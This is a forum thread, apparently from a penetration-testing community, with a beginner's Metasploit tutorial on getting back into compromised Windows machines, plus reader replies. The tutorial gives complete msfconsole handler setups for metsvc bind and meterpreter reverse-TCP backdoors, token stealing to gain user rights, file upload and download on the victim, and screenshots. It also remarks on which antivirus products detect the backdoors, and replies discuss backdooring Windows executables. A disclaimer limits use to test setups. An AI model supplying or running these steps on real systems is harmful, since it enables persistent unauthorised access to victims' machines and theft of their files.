If this is your first visit, be sure to
check out the Forum Rules by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

METSVC:
VERY BAD: All 3 files is use gets flagged by Norton Internet Security 2011 as trojan, maybe other AV's will do this too!
BAD: If ip change you have to know the IP to connect back to Victim
GOOD: Easy to use
GOOD: It dosn't request YOUR IP and port!

PERSISTENCE:
BAD: It requests YOUR IP and port!
BAD: Can be more "difficult" to use
GOOD: Flexible
GOOD: Auto Connect
ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It's only when you run NPE (Norton Power Eraser) it is detected as bad, and will be removed. and that's a tool you must download!

-------------------------------------

{GET BACK INTO SYSTEM} (using metsvc in a new terminal)

Code:

cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337 (Must be this port of what i know)
set RHOST [VICTIM IP ADRESS]
show options (see if your setup is correct)
exploit

------------------------------------

{GET BACK INTO SYSTEM} (using persistence in a new terminal)

Code:

cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADRESS INT.]
set LPORT [PORT]# The port set in persistence backdoor
show options
exploit

----------# Now we wait for connection, it will reconnect to your computer within 300 sec
----------

getuid # If = "NT AUTHORITY\SYSTEM" do this else go to "use priv":

ps # Find PID on explorer.exe

steal_token [NUMBER - PID on explorer]# From what i know it grants you the same rights as the user running that process

# Use "ls", "pwd" and "cd" to navigate around - see below under commands

Explanation:
Create a txt file on yout BT4 desktop and write any thing in it, or nothing, and save it with the name "test.txt" then in terminal in meterpreter console (after your connected to victim), navigate to the desktop of the user currently logged in.
Use "pwd" without quotes, to check if the path is correct, if it is type the following:

{Upload}

Code:

upload /root/test.txt test.txt
# and if you are uploading a file with space in it's name:
upload "/root/test 2.txt" "test 2.txt"

# Or if your not in the path where you want to upload a file, and want it to be uploaded to another folder

Explanation:
Now we are going to download the file we just uploaded the "test.txt". Navigate to the folder if your not already in it, by using the "cd", "pwd" and "ls" commands.

Then type:

Code:

download test.txt /root/test.txt
# And if you are downloading a file with space in it's name
download "test 2.txt" "/root/test 2.txt"
# Or if your not in the path where you want to download a file from, but know the exact path and name by using search
download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
# Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"

------------------------------------
{Commands} (meterpreter console)

help# USE THIS!!! thats mostly how i got this knowledge and then googled the commands to get more info on them

screenshot# No need to say what it does - remember you must have used "use priv" in meterpreter first

First i will say, USE THIS AT YOUR OWN RISK! Do not blame me for anything. DO NOT misuse this information, only use this in a test setup!

And i will point out for other beginners, i started on using metasploit 2 days ago so do your self a favour and put some heart into it, do your legwork before asking, i just gave you a complete detailed guide from start to finish, on a silver platter.

As always, if you have any questions, google it first and then google it some more, and THEN ask for directions, not the solution!

: i started on using metasploit 2 days ago so do your self a favour and put some heart into it, do your legwork before asking, i just gave you a complete detailed guide from start to finish, on a silver platter.

Well most beginners ask becaus they just want the info so that they can misuse it to do harm, without a better understanding of what it is they are doing. where only a few ask becaus they really want to learn some thing from it.

I know this guide can and will be misused by some ppl. and i'm fine with that, i just hope they get caught I don't have respect for ppl who want to break into others system without their permission, i really can't see the point in it :/

I'm learning this so that i know a little more about how I can be attacked, and i use this info so that i maybe can close some holes in my setup at home And it's also quite fun

I've found that getting into the security end has really forced me to get deeper into the protocols and such that I've already been working with as a networker.

Also, though perhaps indirectly, pentesting and the security 'arts' eventually (not always...) force developers round the world to improve their code. Any everybody likes better software.

I appreciated the section you did on backdooring. You may want to include the backdooring an exe capability. If you're not sure how to with metasploit, check out the metasploit unleashed section on extended msf usage.
Chapter 12 section 2. Great feature, although the MSF unleashed page only goes into the beginning detail of it, probably due to all of our favorite mantra (try harder!)

Yes indeed a great tut, I have yet to try it. Like like all tuts I have been through there are always issues to get around, and that is the fun of it. No attack is completley linear to the others, and in turn forces you to learn outside the given realm.

I am not a security professional, more-so an enthusiast. It is tuts like these that not only educate people like me, but allow me to apply said education and offer the information to others who do not have the time or knowledge.

I have had numerous friends have their Data-Limits completley thrashed by intruders, which casues them to spend more money. I have had mine and other friends banking information sniffed out (By neighbours who had a little run in with the law post hack) and in turn have used what little information I have to ameturley secure their networks and routers.

And to think 2 months ago I was completley ignorant to BackTrack, and now after two months of passive learning, I can say that I have the basic knowledge and ability to secure minor residential networks for friends and family, and I have these forums to thank, and the posters I am indebted to. No one will be stealing my Gigabytes and money anymore!

Thanks for the tuts, the help, the information and overall professional attitude reflected by a majority of users on this site. Thanks again.

I've found that getting into the security end has really forced me to get deeper into the protocols and such that I've already been working with as a networker.

Also, though perhaps indirectly, pentesting and the security 'arts' eventually (not always...) force developers round the world to improve their code. Any everybody likes better software.

I appreciated the section you did on backdooring. You may want to include the backdooring an exe capability. If you're not sure how to with metasploit, check out the metasploit unleashed section on extended msf usage.
Chapter 12 section 2. Great feature, although the MSF unleashed page only goes into the beginning detail of it, probably due to all of our favorite mantra (try harder!)

I've had a lot of fun messing around with backdooring a few of the most used windows exe's.

I can see you've done your reading however. Great tut! esp after the editing you've done

About backdooring an exe: I already have that in the "Create the exploit". The first code box in the guide. i use encode here and i also explain i LITTLE bit about the error you can get I didn't go directly into details, but if thats what you guys want i can do that too By the way, have any of you got the "-k" option to work yet, so that the exe your backdooring still work? If yes, pleas post an example code

And again, I'm a beginner so please correct me if have understood anything wrong or I explained anything in the wrong way!

You said that this tutorial is for beginners, you've omitted many details that need a layman to understand.
The format is very tiring to read.

And i will point out for other beginners, i started on using metasploit 2 days ago so do your self a favour and put some heart into it, do your legwork before asking, i just gave you a complete detailed guide from start to finish, on a silver platter.

For two days, until you learn something fast, now spend about 40 days more and learning more about text formatting too!